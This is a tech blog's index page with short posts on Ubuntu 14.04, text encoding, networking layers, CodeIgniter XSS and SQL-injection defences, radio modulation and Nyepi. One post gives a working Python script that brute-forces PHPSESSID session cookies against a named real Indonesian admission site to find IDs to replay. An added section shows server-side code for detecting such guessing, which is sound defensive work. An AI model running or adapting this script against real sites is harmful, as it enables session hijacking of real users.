Ubuntu 14.04 LTS released!

Finally, the new Long Term Support (LTS) release of Ubuntu came out on 17th April, 2014. Whether you upgrade Ubuntu at every single release or use only LTS releases for the sake of stability and maturity, you can now run do-release-upgrade from a terminal or download the Ubuntu live image from http://releases.ubuntu.com/trusty/ or a nearby mirror.

Screenshot 2014-04-17 23:02:47

And now, wait for my next post for the review. I hope this upgrade will run smoothly.

Script-Kiddey: Session ID Bruteforce with Python

Last year, I got a task to do some penetration testing on ujian.sbmptn.or.id. This site was used for registration for Indonesia’s National Selection for Public University Admission (Seleksi Bersama Masuk Perguruan Tinggi Negeri, SBMPTN). The first thing I did was to determine how this simple site reacts when we pass it a bogus session ID cookie (as I usually do).

Here is a tool to accomplish this. To use it, first determine the MD5 checksum of the page the site returns when it is given a wrong session ID, then put it in the CHECKSUM variable. And don’t forget to analyse the format of the tested site’s session ID first to determine its pattern. In this script, the session ID is 26 lowercase alphanumeric characters.

import httplib
import hashlib
import random
import string
import datetime

# Normal react web page's md5 checksum
CHECKSUM = "f98a1ee2197ee3e880f235236285ff58"

# Site
server = "ujian.sbmptn.or.id"
address = "/login.php"

f_success = open("success_token", "a")
f_fail = open("fail_token", "a")

success = 0
fail = 0

def do_exploit(phpsessid):
    # Both counters live at module level, so both must be declared global here
    global success, fail
    conn = httplib.HTTPConnection(server, timeout=10)
    
    try:
        conn.request("POST", address, "", {"Cookie": "PHPSESSID=" + phpsessid + "; path=/"})
        time = str(datetime.datetime.now())
        resp = conn.getresponse()
        data = resp.read()
        
        # MD5 Checksum
        md5 = hashlib.md5()
        md5.update(data)

        result = md5.hexdigest()
        if (CHECKSUM == result):
            fail = fail + 1
            f_fail.write(time + " " + phpsessid + "\n")
        else:
            success = success + 1
            f_success.write(time + " " + phpsessid + "\n")

    except:
        print "Something happened"

while 1:
    phpsessid = ''.join(random.choice(string.ascii_lowercase + string.digits) for x in range(26))
    do_exploit(phpsessid)

When you run this script, check the file written through f_success (“success_token”). If it contains anything, then you may have found a working session ID you can replay/inject.
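Seen from the server side, the loop above shows up as one client sending a stream of distinct, never-issued PHPSESSID values to /login.php. The detection logic below is an added example, not part of the original post; the log format, the IP addresses, the threshold and window, and the `issued` set (an export of the session store) are assumptions, and all log lines are constructed.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

def parse(line):
    """Constructed log format: ISO time, client IP, path, PHPSESSID value."""
    ts, ip, path, sid = line.split()
    return datetime.fromisoformat(ts), ip, path, sid

def guessing_clients(lines, issued, threshold=20, window=timedelta(minutes=1)):
    """Return {ip: peak} for clients that sent at least `threshold` distinct,
    never-issued session IDs to /login.php inside one sliding `window`.
    Assumes the log lines are in time order."""
    recent = defaultdict(deque)      # ip -> (time, sid) pairs still in window
    peak = defaultdict(int)
    for ts, ip, path, sid in map(parse, lines):
        if path != "/login.php" or sid in issued:
            continue                 # other pages, or a session the server issued
        q = recent[ip]
        q.append((ts, sid))
        while ts - q[0][0] > window:
            q.popleft()
        # Count distinct values: a browser replaying one expired cookie is not guessing.
        peak[ip] = max(peak[ip], len({s for _, s in q}))
    return {ip: n for ip, n in peak.items() if n >= threshold}

def constructed_sample():
    """Constructed data: a guesser, a logged-in user, a user with a stale cookie."""
    issued = {"k3v9q2m7x1c8b5n0z4w6r2t8ya"}   # assumed export of the session store
    base = datetime(2014, 4, 17, 10, 0, 0)
    lines = []
    for i in range(30):
        t = (base + timedelta(seconds=i)).isoformat()
        lines.append(f"{t} 198.51.100.7 /login.php {i:026x}")      # new ID each time
        lines.append(f"{t} 203.0.113.5 /login.php k3v9q2m7x1c8b5n0z4w6r2t8ya")
        lines.append(f"{t} 203.0.113.9 /login.php {'e' * 26}")     # same stale ID
    return lines, issued

if __name__ == "__main__":
    log, issued_ids = constructed_sample()
    print(guessing_clients(log, issued_ids))
```

The space the script samples, 26 characters from a 36-symbol alphabet, holds 36^26 ≈ 2.9 × 10^40 values, so rate-limiting and alerting on this pattern costs legitimate users nothing.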

How to digitally represent text

In the digital world, everything from text and media to models of the real world is represented by nothing more than combinations of 1 and 0. The complex modern computer and smart electronic appliances are built on foundations as simple as a digital logic gate such as the NAND gate, which converts two binary inputs into one binary output. As the NAND gate shrank from a power-hungry, lamp-sized vacuum tube to a micron-scale piece of die in a microprocessor, the size of the computer and its processing power changed with it. A person from the 1940s might not have imagined that a palm-sized computer after 2010 could be used to render complex 3D objects, watch videos, and communicate with others through the internet.

In this post, I will tell you how the computer represents text, from one character to a book of a hundred pages.


Layering in Networking in a Nutshell: Down to Up (Part 1)

When you try to learn more about computer networking technology and its applications, the first thing you have to learn before getting started is the basics of the computer networking layers. You have to know what technology stack forms the backbone of the internet that you use to read the posts on my blog. It needs to be standardised, fully compatible and interoperable, because it won’t be funny if your chat application only works on a wired network and doesn’t work on a wireless one.

So in this post, I will tell you how the layering inside networking works from the bottom up and back down again. There are two standards that define every layer of the computer network stack: the OSI layers and the TCP/IP layers. The two look alike, but in this reference I will use a hybrid of them.


I saw this in Arstechnica…

Screenshot 2014-04-03 21:51:48

I have my original Windows 8 license, which came as OEM with my HP notebook. And you know what? It is still plain and has never been updated since my 4th semester (the time when I was supposed to learn .NET Framework using Visual Studio). This notebook is still baking in Ubuntu Linux 12.04 LTS. My chimney smells of Linux. :D

But I am proud that Microsoft still hears what users demand. It will be a great update, especially for users who don’t own any touchscreen.

Arstechnica – Future Windows 8.1 update will finally bring back the Start menu

CodeIgniter: Two actions to prevent SQL Injection

In my previous post, I explained how to prevent XSS injection in your CodeIgniter apps. Now, for those who are new to web programming, I will tell you about another kind of security hole in web programming, one that can be fatal because it can expose the inner side of your application’s database: SQL injection.


CodeIgniter: Apply XSS filter as mandatory

If you are new to web programming and have no idea what XSS is, here is what it is: “It is one kind of web application security hole that makes use of unsanitized input so the intruder can input some Javascript/HTML in it”. Is it a big deal? Yes, of course, because if they can do that, the malicious user input will be interpreted as real Javascript/HTML tags and will therefore be processed/executed when it is printed.

Thankfully, CodeIgniter, a PHP application framework that is still gaining users, has a capability to deal with it. It has an XSS filtering mechanism that can be applied to sanitize user input from GET/POST/cookie data. To use it, just open the CodeIgniter configuration file /application/config/config.php and edit this line:

$config['global_xss_filtering'] = TRUE;  # It is FALSE by default

Now if an adversary enters something like <script>alert(0);</script> into one of your application’s inputs, it will be converted to [removed]alert(0);[removed] so that it won’t be interpreted as Javascript.

But remember, stick with $this->input->post("variable") or $this->input->get("variable") when you are dealing with user input. Forget about the thing you learnt in your first PHP class ($_POST[] or $_GET[]).

Wave, Radio and Modulation: How we send a data through radio wave

Some of you might still be wondering how radio communication actually works and how it can send/retrieve data. Is it some kind of magic, or has someone brought a kind of telepathy technology into reality? Nope. If you believe in science, it is just normal physics-based technology built on the theory of waves. In this post, I will tell you a bit about the theory of waves, radio and modulation from what I learned in my Wireless Network class. This is the very foundation of how what you know as Wifi, mobile phones, Bluetooth, GSM, CDMA, LTE, etc. work in today's world.


Nyepi: The day of absolute silence

Balinese and all Indonesian Hindu (Hindu Dharma) adherents have a unique celebration called Nyepi. “Nyepi” in Indonesian/Balinese means “Silence”. Unlike many other celebrations around the world, which celebrate something by doing something big, like a party, a fest, or maybe a crowd gathering, on Nyepi day people just keep silent. They don’t go out of the home (with or without a vehicle, except in an emergency), they don’t speak too loudly, and there is no entertainment (literally), no working (also literally), no light and even no electricity (literally). On this occasion, all family members just gather together in their parents’ house.


Logitech Unifying Receiver on Ubuntu Linux

An hour ago, I bought a brand new wireless mouse, namely a Logitech m235 (solid grey color). It was only 165.000 IDR (or ~15 USD) at some random local market. Previously, I had used two different wireless mice at different times: a Logitech M185, which I bought around mid-2012 and whose right-click button broke (otherwise, it still works), and a wireless mouse + keyboard combo from some random Chinese brand, which I bought last month and whose receiver suddenly broke. Wew.
